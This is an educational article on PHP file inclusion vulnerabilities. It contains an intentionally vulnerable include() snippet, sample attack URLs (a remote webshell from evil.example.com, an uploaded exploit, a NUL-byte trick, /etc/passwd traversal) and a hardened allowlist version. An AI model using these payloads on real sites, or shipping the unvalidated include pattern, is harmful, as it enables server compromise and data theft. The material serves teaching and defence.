A file inclusion vulnerability is a type of vulnerability most often found on websites.
It allows an attacker to include a file, usually through a script on the web server.
The vulnerability occurs due to the use of user-supplied input without proper validation.
This can lead to something as minimal as outputting the contents of the file or more serious events such as:
- Code execution on the web server
- Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS)
- Denial of service (DoS)
- Data theft/manipulation
include and require statements
Example
<?php
// Vulnerable: the COLOR request parameter is passed to include() without validation.
if ( isset( $_GET['COLOR'] ) ) {
    include( $_GET['COLOR'] . '.php' );
}
?>
<form method="get">
    <select name="COLOR">
        <option value="red">red</option>
        <option value="blue">blue</option>
    </select>
    <input type="submit">
</form>
An attacker can then make the web server include a malicious page or file:
- /vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - injects a remotely hosted file containing malicious code.
- /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - executes code from an already uploaded file called exploit.php (local file inclusion vulnerability).
- /vulnerable.php?COLOR=C:\\notes.txt - example using the NULL meta character to remove the .php suffix, allowing access to files other than .php. (Enabling magic_quotes_gpc limits the attack by escaping special characters, thus disabling the use of the NUL terminator.)
- /vulnerable.php?COLOR=/etc/passwd - allows an attacker to read the contents of the passwd file on a UNIX system through directory traversal.
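A hardened counterpart to the vulnerable script above, added here as an example (it is not code from the original page): the request value only selects an entry from a fixed allowlist and never becomes part of the included path. The colors directory and the resolve_color_page() helper are assumptions made for illustration.

```php
<?php
// Added example, not from the original page: hardened version of vulnerable.php.
// Assumption: the colour templates live in a "colors" directory beside this script.
const COLOR_DIR = __DIR__ . '/colors';

// Allowlist: accepted request value => file name chosen by the developer.
const COLOR_PAGES = [
    'red'  => 'red.php',
    'blue' => 'blue.php',
];

/**
 * Return the absolute path to include for the requested colour,
 * or null when the request must be rejected.
 * (Hypothetical helper name, introduced for this example.)
 */
function resolve_color_page($requested): ?string
{
    // Arrays (COLOR[]=x) and any value outside the allowlist are rejected,
    // so URLs, drive paths, NUL bytes and ../ sequences never reach include.
    if (!is_string($requested) || !array_key_exists($requested, COLOR_PAGES)) {
        return null;
    }

    // Defence in depth: the resolved file must exist inside COLOR_DIR.
    $base = realpath(COLOR_DIR);
    $path = realpath(COLOR_DIR . '/' . COLOR_PAGES[$requested]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

if (isset($_GET['COLOR'])) {
    $page = resolve_color_page($_GET['COLOR']);
    if ($page === null) {
        http_response_code(400);
        exit('Unknown colour');
    }
    include $page;
}
?>
```

Keeping allow_url_include set to Off in php.ini blocks the remote-URL variant on its own, but the local inclusion variants still require the allowlist.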